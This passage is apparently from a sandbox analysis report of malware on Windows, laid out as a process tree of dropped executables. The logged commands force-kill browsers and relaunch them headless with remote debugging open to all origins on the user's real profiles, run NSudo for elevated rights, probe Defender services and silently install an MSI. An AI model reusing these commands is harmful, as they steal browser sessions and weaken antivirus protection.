        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3236,i,4682942527204264063,10072899293702120945,262144 --disable-features=PaintHolding --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3232 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:12548
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3260,i,4682942527204264063,10072899293702120945,262144 --disable-features=PaintHolding --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3256 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:25148
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4336,i,4682942527204264063,10072899293702120945,262144 --disable-features=PaintHolding --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3784 /prefetch:9
        8⤵
        Uses browser remote debugging
        
        PID:25128
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4544,i,4682942527204264063,10072899293702120945,262144 --disable-features=PaintHolding --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4604 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:25056
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5272,i,4682942527204264063,10072899293702120945,262144 --disable-features=PaintHolding --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5228 /prefetch:14
        8⤵
        
        PID:31924
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:32000
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM msedge.exe
        7⤵
        Kills process with taskkill
        
        PID:32404
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data"
        7⤵
        Uses browser remote debugging
        
        PID:25164
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x234,0x238,0x23c,0x230,0x2fc,0x7ff9c67ef208,0x7ff9c67ef214,0x7ff9c67ef220
        8⤵
        
        PID:32116
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=3080,i,18321757472819114946,8885482567011120904,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3076 /prefetch:11
        8⤵
        
        PID:32512
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2940,i,18321757472819114946,8885482567011120904,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2928 /prefetch:2
        8⤵
        
        PID:32684
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=3188,i,18321757472819114946,8885482567011120904,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3180 /prefetch:13
        8⤵
        
        PID:32708
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3500,i,18321757472819114946,8885482567011120904,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3496 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:32728
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3516,i,18321757472819114946,8885482567011120904,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3504 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:32504
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=3240,i,18321757472819114946,8885482567011120904,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4852 /prefetch:14
        8⤵
        
        PID:28380
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4844,i,18321757472819114946,8885482567011120904,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2396 /prefetch:14
        8⤵
        
        PID:27160
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4964,i,18321757472819114946,8885482567011120904,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4952 /prefetch:14
        8⤵
        
        PID:26764
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4976,i,18321757472819114946,8885482567011120904,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4980 /prefetch:14
        8⤵
        
        PID:11496
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5036,i,18321757472819114946,8885482567011120904,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4848 /prefetch:14
        8⤵
        
        PID:11484
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5564,i,18321757472819114946,8885482567011120904,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5556 /prefetch:14
        8⤵
        
        PID:8352
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5772,i,18321757472819114946,8885482567011120904,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5768 /prefetch:14
        8⤵
        
        PID:9656
  - - C:\Users\Admin\AppData\Local\Temp\10479900101\CmvdYC4.exe
      "C:\Users\Admin\AppData\Local\Temp\10479900101\CmvdYC4.exe"
      4⤵
      PID:5888
    - - C:\Users\Admin\AppData\Local\Temp\onefile_5888_133884501947767163\ZSoeRVBe.exe
        
        C:\Users\Admin\AppData\Local\Temp\10479900101\CmvdYC4.exe
        5⤵
        
        PID:2204
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -c "Get-WmiObject -Query \"Select * from Win32_CacheMemory\""
        6⤵
        
        PID:18796
  - - C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe
      "C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe"
      4⤵
      PID:9832
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3n4pod5j\3n4pod5j.cmdline"
        5⤵
        
        PID:25124
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE4A9.tmp" "c:\Users\Admin\AppData\Local\Temp\3n4pod5j\CSCDE96779276FF4F50829F4073FC6F07D.TMP"
        6⤵
        
        PID:2344
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:31556
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:2712
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:4888
      - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        6⤵
        
        PID:25188
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        --restore-last-session --remote-debugging-port=9225 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default"
        6⤵
        Uses browser remote debugging
        
        PID:12276
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x244,0x248,0x24c,0x240,0x220,0x7ff9c67ef208,0x7ff9c67ef214,0x7ff9c67ef220
        7⤵
        
        PID:19984
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        --restore-last-session --remote-debugging-port=9223 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
        6⤵
        Uses browser remote debugging
        
        PID:26740
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9c796dcf8,0x7ff9c796dd04,0x7ff9c796dd10
        7⤵
        
        PID:11220
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-cache --no-first-run --disable-background-networking --disable-sync --headless
        6⤵
        
        PID:8464
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\HeadlessChrome8464240937015 /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\HeadlessChrome8464240937015\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\HeadlessChrome8464240937015 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x260,0x264,0x268,0x48,0x26c,0x7ff9c66fdcf8,0x7ff9c66fdd04,0x7ff9c66fdd10
        7⤵
        
        PID:20420
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome8464240937015" --field-trial-handle=2724,i,14823343074489026573,5252230117912299248,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2720 /prefetch:11
        7⤵
        
        PID:31752
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome8464240937015" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2692,i,14823343074489026573,5252230117912299248,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2684 /prefetch:2
        7⤵
        
        PID:7148
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome8464240937015" --enable-dinosaur-easter-egg-alt-images --disable-databases --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2872,i,14823343074489026573,5252230117912299248,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2868 /prefetch:1
        7⤵
        
        PID:18672
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome8464240937015" --enable-dinosaur-easter-egg-alt-images --disable-databases --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2896,i,14823343074489026573,5252230117912299248,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2892 /prefetch:1
        7⤵
        
        PID:19324
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome8464240937015" --field-trial-handle=2804,i,14823343074489026573,5252230117912299248,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2768 /prefetch:13
        7⤵
        
        PID:4032
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome8464240937015" --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4068,i,14823343074489026573,5252230117912299248,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4048 /prefetch:9
        7⤵
        
        PID:27728
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome8464240937015" --enable-dinosaur-easter-egg-alt-images --disable-databases --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3552,i,14823343074489026573,5252230117912299248,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3548 /prefetch:1
        7⤵
        
        PID:32048
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome8464240937015" --extension-process --enable-dinosaur-easter-egg-alt-images --disable-databases --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3588,i,14823343074489026573,5252230117912299248,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3584 /prefetch:9
        7⤵
        
        PID:1028
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome8464240937015" --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4040,i,14823343074489026573,5252230117912299248,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4036 /prefetch:9
        7⤵
        
        PID:18544
  - - C:\Users\Admin\AppData\Local\Temp\10480910101\DgQBvwg.exe
      "C:\Users\Admin\AppData\Local\Temp\10480910101\DgQBvwg.exe"
      4⤵
      PID:1320
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pp2op2ue\pp2op2ue.cmdline"
        5⤵
        
        PID:32148
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES18AA.tmp" "c:\Users\Admin\AppData\Local\Temp\pp2op2ue\CSCBF75EB19EC034AC6B6A7557E826BDC9.TMP"
        6⤵
        
        PID:32324
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:32480
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:32504
  - - C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10481850271\ArFLIYD.msi" /quiet
      4⤵
      PID:31940
  - - C:\Users\Admin\AppData\Local\Temp\10482110101\65ddff8bf2.exe
      "C:\Users\Admin\AppData\Local\Temp\10482110101\65ddff8bf2.exe"
      4⤵
      PID:32460
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\11.bat" "
        5⤵
        
        PID:32752
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\11.bat" any_word
        6⤵
        
        PID:24996
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        7⤵
        
        PID:19888
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKU\S-1-5-19"
        7⤵
        
        PID:4844
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f
        7⤵
        
        PID:5996
        
        C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe
        
        NSudoLG -U:T -P:E -UseCurrentConsole C:\Users\Admin\AppData\Local\Temp\11.bat
        7⤵
        
        PID:27728
        
        C:\Windows\SysWOW64\mode.com
        
        Mode 79,49
        7⤵
        
        PID:19572
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        7⤵
        
        PID:32524
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA"
        7⤵
        
        PID:2592
        
        C:\Windows\SysWOW64\find.exe
        
        find /i "0x0"
        7⤵
        
        PID:30280
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist
        7⤵
        
        PID:23336
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        
        PID:23436
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\WinDefend"
        7⤵
        
        PID:29384
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\MDCoreSvc"
        7⤵
        
        PID:27480
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\WdNisSvc"
        7⤵
        
        PID:19968
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\Sense"
        7⤵
        
        PID:26024
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\wscsvc"
        7⤵
        
        PID:10044
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\SgrmBroker"
        7⤵
        
        PID:20208
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\SecurityHealthService"
        7⤵
        
        PID:10116
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\webthreatdefsvc"
        7⤵
        
        PID:12552
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\webthreatdefusersvc"
        7⤵
        
        PID:14700
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\WdNisDrv"
        7⤵
        
        PID:17420
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\WdBoot"
        7⤵
        
        PID:15028
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\WdFilter"
        7⤵
        
        PID:20232
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\SgrmAgent"
        7⤵
        
        PID:6544
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\MsSecWfp"
        7⤵
        
        PID:972
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\MsSecFlt"
        7⤵
        
        PID:13556
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Services\MsSecCore"
        7⤵
        
        PID:14716
  - - C:\Users\Admin\AppData\Local\Temp\10482500101\pered.exe
      "C:\Users\Admin\AppData\Local\Temp\10482500101\pered.exe"
      4⤵
      PID:32516
  - - C:\Users\Admin\AppData\Local\Temp\10483150101\5Jq9U1v.exe
      "C:\Users\Admin\AppData\Local\Temp\10483150101\5Jq9U1v.exe"
      4⤵
      PID:19952
  - - C:\Users\Admin\AppData\Local\Temp\10483770101\Cheeto.exe
      "C:\Users\Admin\AppData\Local\Temp\10483770101\Cheeto.exe"
      4⤵
      PID:32152
  - - C:\Users\Admin\AppData\Local\Temp\10484020101\edeb54256a.exe
      "C:\Users\Admin\AppData\Local\Temp\10484020101\edeb54256a.exe"
      4⤵
      PID:28816
  - - C:\Users\Admin\AppData\Local\Temp\10484030101\74a7c4a01d.exe
      "C:\Users\Admin\AppData\Local\Temp\10484030101\74a7c4a01d.exe"
      4⤵
      PID:27948
  - - C:\Users\Admin\AppData\Local\Temp\10484040101\5b2c3f2815.exe
      "C:\Users\Admin\AppData\Local\Temp\10484040101\5b2c3f2815.exe"
      4⤵
      PID:6904
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        5⤵
        Kills process with taskkill
        
        PID:11484
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        5⤵
        Kills process with taskkill
        
